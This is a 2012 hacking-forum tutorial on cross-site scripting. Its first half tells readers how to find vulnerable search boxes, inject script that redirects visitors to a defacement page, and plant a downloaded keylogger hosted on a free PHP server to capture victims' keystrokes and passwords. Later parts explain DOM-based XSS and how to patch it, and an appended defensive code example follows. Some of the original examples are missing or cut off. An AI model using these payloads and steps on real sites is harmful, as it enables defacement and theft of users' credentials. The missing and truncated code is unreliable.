Nov 20, 2012

[TUT]Hack websites using XSS[TUT][HQ]


What is XSS, and what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of scripting language into the website, whether it be JavaScript, HTML or XML. XSS is mainly directed at JavaScript injection.
Most people use it to display messages on the website, redirect you to their defacement, and even put cookie loggers and XSS shells on the website.


Reason behind the XSS vulnerability?

Poor PHP coding within text boxes and submission forms. The developers were too lazy to code it properly, allowing us to inject strings into the source code; since what we submit is echoed back into the source code, we then see the result of what we put in. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

Types of XSS

There are three types of XSS: DOM-based, persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website; you will only see it once. With persistent XSS you can do much more: leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

How to test for XSS vulnerabilities?

To test if the website is vulnerable to XSS we want to go to a search box and inject some JavaScript. We've found a search box and now we want to use JavaScript to alert a message so we can see if the JavaScript was successfully executed.

<*script*>alert('XSS');

(Important: please remove the "*" characters, or type the above text into the search box without the "*".)

Now we will see a pop-up message "XSS" (shown in the picture).

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*alert('XSS');

(Important: please remove the '*' characters, or type the above text into the search box without the '*'.)

Now we have found out that it is vulnerable. Let's go to the next step.

Defacing/hacking a webpage with XSS?

Here is the important part, which explains defacing a website. I have methods for both persistent and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent, I want to redirect my victims to a deface page. We simply inject some more JavaScript like we did before: <*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*> (Important: please remove the '*' characters, or type the above text into the search box without the '*'.) Remember, you can always alter the code if it doesn't work. You can do many things with XSS; you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger?

As we know, we can run our own scripts on websites that have an XSS vulnerability. We use our keylogging script on the XSS-vulnerable website.

To perform this attack we need three things:

XSSed site (that is, an XSS-vulnerable site)

Web hosting service (free) ==> http://www.000webhost.com/

Keylogging script

First of all, download the script from the link below:

http://sharesend.com/fnfie

Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

Now open Logger.js and change the URL of your script. The default URL is http://yourwebsite.com; just change it to your hosting URL.

Now host all these scripts on your web host.

Now find an XSS-vulnerable website and include the script link like this:
http://targetwebsite.com/search.php?q="


Now if someone clicks on that link, everything they type in on that page will go to the data.txt file. This script captures all the keystrokes and saves them to the file with the help of the PHP script.

If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

DOM-based XSS

What is DOM?

DOM stands for Document Object Model. It allows client-side scripts (e.g. JavaScript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML page that accepts and writes user input using JavaScript with the help of the DOM.








If you know HTML and JavaScript, understanding the above code is a piece of cake.

In the above example, the JavaScript code gets the value from the URL parameter "BTSinput" and writes that value into our webpage.

Did you notice? That part of the webpage is not written by a server-side script. The client-side script modifies the content dynamically based on the input. Everything is done with the help of the DOM object 'document'.

DOM Based XSS vulnerability:

When a developer writes content using a DOM object without sanitizing the user input, it allows an attacker to run his own code.

In the above example, we failed to sanitize the input and simply displayed whatever value we got from the URL.

An attacker with malicious intent can inject an XSS vector instead.

As I said earlier, the document.write function simply writes the value of the BTSinput parameter into the webpage. So it will write the '' into the webpage without sanitizing. This results in the script code running and displaying the alert box.

Patching the DOM-based cross-site scripting vulnerability

Audit all JavaScript code in use by your application to make sure that untrusted data is escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values


Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.
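The following is an added example, not code from the original post. It models the DOM-based sink from the BTSinput example above and the "white list" escaping recommended in the patching section as pure functions, so it runs under Node without a browser. renderUnsafe() builds the same markup that document.write('Hi ' + value) would produce; renderSafe() runs the value through an allowlist escaper that lets only alphanumeric characters through and turns everything else into a numeric HTML entity. Note that encodeURI() is a URL encoder; when the destination is HTML markup, as in the page's example, the escaping must be HTML entity encoding, which is what the escaper below does. Function names, the sample URLs and the <p> template are assumptions of this example.

```javascript
// Added example (not from the original post). Models the page's BTSinput
// document.write() sink as pure string functions so it runs under Node.

// Extract one query-string parameter, as the page's example reads "BTSinput".
// `search` is the raw value of location.search, e.g. "?BTSinput=Bob".
function getParam(search, name) {
  const query = search.startsWith('?') ? search.slice(1) : search;
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (decodeURIComponent(key.replace(/\+/g, ' ')) !== name) continue;
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  }
  return null;
}

// Allowlist escaper (the "escape everything by default" approach): every
// character outside [A-Za-z0-9] becomes a numeric HTML entity, so markup
// characters such as < > " ' / can never reach the HTML parser as syntax.
function escapeHtmlAllowlist(value) {
  let out = '';
  for (const ch of String(value)) {
    out += /^[A-Za-z0-9]$/.test(ch) ? ch : '&#' + ch.codePointAt(0) + ';';
  }
  return out;
}

// Vulnerable: the parameter value is concatenated straight into the markup,
// which is exactly what document.write('Hi ' + value) does in the page's example.
function renderUnsafe(search) {
  const value = getParam(search, 'BTSinput');
  return '<p>Hi ' + (value === null ? '' : value) + '</p>';
}

// Hardened: same sink, same template, but the value is escaped first.
function renderSafe(search) {
  const value = getParam(search, 'BTSinput');
  return '<p>Hi ' + escapeHtmlAllowlist(value === null ? '' : value) + '</p>';
}

// Review check: does the rendered HTML contain any tag other than the
// template's own <p>? True means untrusted input changed the page structure.
function containsUnexpectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<\/?p>$/.test(t));
}

// Constructed sample inputs (not from the page): a benign name and a probe
// that carries markup, URL-encoded the way a browser would send it.
const benign = '?BTSinput=Bob';
const probe = '?BTSinput=' + encodeURIComponent('<b>x</b>');
console.log('unsafe :', renderUnsafe(probe), '->', containsUnexpectedTag(renderUnsafe(probe)));
console.log('safe   :', renderSafe(probe), '->', containsUnexpectedTag(renderSafe(probe)));
console.log('benign :', renderSafe(benign));
```

In a real page the better fix is to avoid the dangerous sink altogether: assign the value to an element's textContent property instead of calling document.write() or setting innerHTML, so the browser never parses it as markup. The allowlist escaper is the fallback for code that must keep writing markup strings.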
